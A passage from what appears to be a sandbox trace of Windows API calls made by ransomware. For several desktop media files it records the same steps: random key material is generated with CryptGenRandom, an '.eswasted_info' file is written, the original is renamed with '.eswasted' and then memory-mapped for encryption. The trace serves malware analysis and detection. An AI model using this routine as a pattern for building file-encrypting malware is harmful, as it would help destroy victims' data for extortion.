HALPmcxz\\Desktop\\6pWu7.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6pwu7.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.169] WriteFile (in: hFile=0x100, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.170] SetEndOfFile (hFile=0x100) returned 1 [0072.171] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.171] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.171] lstrcpyW (in: lpString1=0x4e1b1e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6pWu7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6pwu7.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6pWu7.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6pwu7.mp4.eswasted")) returned 1 [0072.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6pWu7.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6pwu7.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.172] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.172] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x3d04 [0072.172] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d04) returned 0x2d0000 [0072.172] CloseHandle (hObject=0xf8) returned 1 [0072.174] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.175] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0072.175] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.175] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.176] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.176] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.184] SetEndOfFile (hFile=0x100) returned 1 [0072.251] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0072.251] CloseHandle (hObject=0x100) returned 1 [0072.272] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.272] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8ec8 | out: hHeap=0x4a0000) returned 1 [0072.273] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.273] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.273] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\er4nkCc.wav") returned 53 [0072.273] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x274) returned 0x4e1ab8 [0072.273] lstrcpyW (in: lpString1=0x4e1b22, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.273] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ed440 [0072.273] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.274] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ed440 | out: pbBuffer=0x4ed440) returned 1 [0072.274] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\er4nkCc.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\er4nkcc.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.275] WriteFile (in: hFile=0x100, lpBuffer=0x4ed440*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ed440*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.276] SetEndOfFile (hFile=0x100) returned 1 [0072.276] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.276] lstrcpyW (in: lpString1=0x4e1b22, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\er4nkCc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\er4nkcc.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\er4nkCc.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\er4nkcc.wav.eswasted")) returned 1 [0072.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\er4nkCc.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\er4nkcc.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.278] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.278] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xa9b0 [0072.278] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa9b0) returned 0x2d0000 [0072.278] CloseHandle (hObject=0xf8) returned 1 [0072.281] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.282] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.282] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.282] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.282] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.282] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.291] SetEndOfFile (hFile=0x100) returned 1 [0072.293] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.293] CloseHandle (hObject=0x100) returned 1 [0072.294] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.294] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dea08 | out: hHeap=0x4a0000) returned 1 [0072.294] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.295] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.295] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fodDj_KRoTe.mkv") returned 57 [0072.295] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4e1ab8 [0072.295] lstrcpyW (in: lpString1=0x4e1b2a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.295] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ed440 [0072.295] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.296] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ed440 | out: pbBuffer=0x4ed440) returned 1 [0072.296] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fodDj_KRoTe.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\foddj_krote.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.297] WriteFile (in: hFile=0x100, lpBuffer=0x4ed440*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ed440*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.298] SetEndOfFile (hFile=0x100) returned 1 [0072.299] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.299] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.299] lstrcpyW (in: lpString1=0x4e1b2a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fodDj_KRoTe.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\foddj_krote.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fodDj_KRoTe.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\foddj_krote.mkv.eswasted")) returned 1 [0072.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fodDj_KRoTe.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\foddj_krote.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.300] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.300] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x12d16 [0072.300] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12d16) returned 0xb10000 [0072.300] CloseHandle (hObject=0xfc) returned 1 [0072.305] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.306] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.306] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.306] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.307] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.307] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.316] SetEndOfFile (hFile=0x100) returned 1 [0072.396] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed440 | out: hHeap=0x4a0000) returned 1 [0072.396] CloseHandle (hObject=0x100) returned 1 [0072.398] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.398] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee288 | out: hHeap=0x4a0000) returned 1 [0072.398] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.399] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.399] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.399] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hl_0NInD x83bhQkUFGR.avi") returned 66 [0072.399] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28e) returned 0x4e1ab8 [0072.399] lstrcpyW (in: lpString1=0x4e1b3c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.399] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.399] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.399] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.400] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hl_0NInD x83bhQkUFGR.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hl_0nind x83bhqkufgr.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.400] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.401] SetEndOfFile (hFile=0x100) returned 1 [0072.402] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.402] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.402] lstrcpyW (in: lpString1=0x4e1b3c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.402] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hl_0NInD x83bhQkUFGR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hl_0nind x83bhqkufgr.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hl_0NInD x83bhQkUFGR.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hl_0nind x83bhqkufgr.avi.eswasted")) returned 1 [0072.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hl_0NInD x83bhQkUFGR.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hl_0nind x83bhqkufgr.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.403] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0072.403] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x61a4 [0072.403] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61a4) returned 0x2d0000 [0072.403] CloseHandle (hObject=0xfc) returned 1 [0072.405] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.406] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.406] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.406] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.407] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.407] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.415] SetEndOfFile (hFile=0x100) returned 1 [0072.418] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.418] CloseHandle (hObject=0x100) returned 1 [0072.419] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.419] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ee508 | out: hHeap=0x4a0000) returned 1 [0072.420] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.420] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.420] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hwAFI-TV.bmp") returned 54 [0072.420] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x276) returned 0x4e1ab8 [0072.420] lstrcpyW (in: lpString1=0x4e1b24, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.420] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.420] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.421] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.421] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hwAFI-TV.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwafi-tv.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.424] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.425] SetEndOfFile (hFile=0x100) returned 1 [0072.425] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.426] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.426] lstrcpyW (in: lpString1=0x4e1b24, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hwAFI-TV.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwafi-tv.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hwAFI-TV.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwafi-tv.bmp.eswasted")) returned 1 [0072.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hwAFI-TV.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hwafi-tv.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0072.427] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.441] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x5884 [0072.441] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5884) returned 0x2d0000 [0072.441] CloseHandle (hObject=0xf8) returned 1 [0072.443] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0072.444] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0072.444] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.444] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0072.445] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0072.445] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.453] SetEndOfFile (hFile=0x100) returned 1 [0072.455] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.455] CloseHandle (hObject=0x100) returned 1 [0072.457] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0072.457] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4deb98 | out: hHeap=0x4a0000) returned 1 [0072.457] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0072.458] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0072.458] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.458] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JhQZ.mp4") returned 50 [0072.458] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26e) returned 0x4e1ab8 [0072.458] lstrcpyW (in: lpString1=0x4e1b1c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.458] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0072.458] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0072.458] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0072.459] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0072.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JhQZ.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jhqz.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0072.459] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.460] SetEndOfFile (hFile=0x100) returned 1 [0072.461] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.461] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0072.461] lstrcpyW (in: lpString1=0x4e1b1c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JhQZ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jhqz.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JhQZ.mp4.eswasted" (normalized: 